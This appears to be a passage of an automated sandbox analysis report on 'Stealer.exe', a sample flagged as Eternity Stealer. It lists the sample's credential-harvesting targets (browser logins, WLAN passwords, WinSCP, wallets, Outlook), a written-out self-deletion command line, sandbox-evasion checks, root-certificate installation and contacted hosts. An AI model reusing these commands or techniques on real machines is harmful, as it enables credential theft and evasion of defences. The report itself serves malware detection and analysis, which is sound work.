Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wlanhlp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll Jump to behavior
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: cryptbase.dll Jump to behavior
Yara signature match
Source: Stealer.exe, type: SAMPLE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.0.Stealer.exe.ad0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: Stealer.exe PID: 2308, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: .csproj2
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@15/0@5/5
Source: C:\Users\user\Desktop\Stealer.exe Mutant created: NULL
Source: C:\Users\user\Desktop\Stealer.exe Mutant created: \Sessions\1\BaseNamedObjects\npbouttkra
Source: C:\Users\user\Desktop\Stealer.exe File created: C:\Users\user\AppData\Local\Temp\tmpC8CC.tmp Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ...................J....................................@c.J..... ......0.-...............jw..............-.............f.................N..... Jump to behavior
Source: Stealer.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Stealer.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\Stealer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\Stealer.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Stealer.exe "C:\Users\user\Desktop\Stealer.exe"
Source: C:\Users\user\Desktop\Stealer.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr All
Source: C:\Users\user\Desktop\Stealer.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\user\Desktop\Stealer.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1
Source: C:\Users\user\Desktop\Stealer.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\user\Desktop\Stealer.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr All Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: Stealer.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Stealer.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Binary contains a suspicious time stamp
Source: Stealer.exe Static PE information: 0x81805410 [Sat Nov 6 15:43:12 2038 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Stealer.exe Code function: 0_2_000007FE93DA79CD push ebx; retf 0_2_000007FE93DA79DA
Source: C:\Users\user\Desktop\Stealer.exe Code function: 0_2_000007FE93D9D980 pushad ; iretd 0_2_000007FE93D9D929
Source: C:\Users\user\Desktop\Stealer.exe Code function: 0_2_000007FE93D800BD pushad ; iretd 0_2_000007FE93D800C1
Source: Stealer.exe, mQ.cs High entropy of concatenated method names: '_003CPerformSelfDestruct_003Eb__1_0', '_003CPerformSelfDestruct_003Eb__1_1', '_003CPerformSelfDestruct_003Eb__1_2', 'HandleSelfDestruct', 'Iqvoaankwbsmkeovdsfoek', 'Iuvlwqesyazuazlxlvwmse', 'Idjirxbssjfcxsxjblftyf', 'Ipyirndbhzenzwaglixhwt', 'Icbxquhcchziremzkgwyky', 'Iwxcwnfbitkwelqzupxifu'

Persistence and Installation Behavior
barindex
Installs new ROOT certificates
Source: C:\Users\user\Desktop\Stealer.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Deletes itself after installation
Source: C:\Windows\System32\cmd.exe File deleted: c:\users\user\desktop\stealer.exe Jump to behavior
Self deletion via cmd or bat file
Source: C:\Users\user\Desktop\Stealer.exe Process created: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\user\Desktop\Stealer.exe"
Source: C:\Users\user\Desktop\Stealer.exe Process created: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\user\Desktop\Stealer.exe" Jump to behavior
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 9200
Source: unknown Network traffic detected: HTTP traffic on port 9200 -> 49166
Source: unknown Network traffic detected: HTTP traffic on port 9200 -> 49166
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\Stealer.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT Jump to behavior
Stores large binary data to the registry
Source: C:\Users\user\Desktop\Stealer.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Users\user\Desktop\Stealer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Size FROM Win32_LogicalDisk WHERE DriveType = 3
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\Stealer.exe Memory allocated: 2C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Memory allocated: 1A1B0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Stealer.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Thread delayed: delay time: 600000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\Stealer.exe Window / User API: threadDelayed 493 Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Window / User API: threadDelayed 9341 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Stealer.exe TID: 2692 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe TID: 2648 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe TID: 2648 Thread sleep time: -3600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe TID: 2588 Thread sleep count: 493 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe TID: 2588 Thread sleep count: 9341 > 30 Jump to behavior
Source: C:\Windows\System32\netsh.exe TID: 2700 Thread sleep time: -60000s >= -30000s Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\Desktop\Stealer.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select TotalPhysicalMemory From Win32_ComputerSystem
Source: C:\Users\user\Desktop\Stealer.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Model from Win32_ComputerSystem
Source: C:\Users\user\Desktop\Stealer.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Manufacturer from Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\Desktop\Stealer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\Stealer.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\Stealer.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Memory allocated: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Stealer.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\user\Desktop\Stealer.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr All Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 Jump to behavior
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\Stealer.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Stealer.exe Queries volume information: C:\Users\user\Desktop\Stealer.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Stealing of Sensitive Information
barindex
Yara detected Eternity Stealer
Source: Yara match File source: Stealer.exe, type: SAMPLE
Source: Yara match File source: 0.0.Stealer.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.333992859.0000000000AD2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Stealer.exe PID: 2308, type: MEMORYSTR
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\Stealer.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\Stealer.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal WLAN passwords
Source: C:\Users\user\Desktop\Stealer.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\Stealer.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Stealer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\Stealer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Searches for user specific document files
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents\JSDNGYCOWY Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents\JSDNGYCOWY Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents\Outlook Files Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents\Outlook Files Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: Stealer.exe PID: 2308, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Eternity Stealer
Source: Yara match File source: Stealer.exe, type: SAMPLE
Source: Yara match File source: 0.0.Stealer.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.333992859.0000000000AD2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Stealer.exe PID: 2308, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1417452 Sample: Stealer.exe Startdate: 29/03/2024 Architecture: WINDOWS Score: 100 35 Malicious sample detected (through community Yara rule) 2->35 37 Antivirus detection for URL or domain 2->37 39 Antivirus / Scanner detection for submitted sample 2->39 41 7 other signatures 2->41 7 Stealer.exe 13 4 2->7         started        process3 dnsIp4 29 pastebin.com 7->29 31 ip-api.com 208.95.112.1, 49163, 80 TUT-ASUS United States 7->31 33 3 other IPs or domains 7->33 43 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 7->43 45 Installs new ROOT certificates 7->45 47 Tries to steal Mail credentials (via file / registry access) 7->47 51 6 other signatures 7->51 11 cmd.exe 7->11         started        14 cmd.exe 7->14         started        signatures5 49 Connects to a pastebin service (likely for C&C) 29->49 process6 signatures7 53 Uses ping.exe to check the status of other devices and networks 11->53 55 Uses netsh to modify the Windows network and firewall settings 11->55 57 Tries to harvest and steal WLAN passwords 11->57 16 netsh.exe 11->16         started        18 findstr.exe 11->18         started        20 chcp.com 11->20         started        59 Deletes itself after installation 14->59 22 PING.EXE 14->22         started        25 chcp.com 14->25         started        process8 dnsIp9 27 127.0.0.1 unknown unknown 22->27
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
208.95.112.1
 ip-api.com United States
53334 TUT-ASUS false
172.67.34.170
 pastebin.com United States
13335 CLOUDFLARENETUS false
149.154.167.99
 t.me United Kingdom
62041 TELEGRAMRU false
188.166.166.142
 unknown Netherlands
14061 DIGITALOCEAN-ASNUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
t.me 149.154.167.99 true
ip-api.com 208.95.112.1 true
pastebin.com 172.67.34.170 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://ip-api.com/json false
    		high
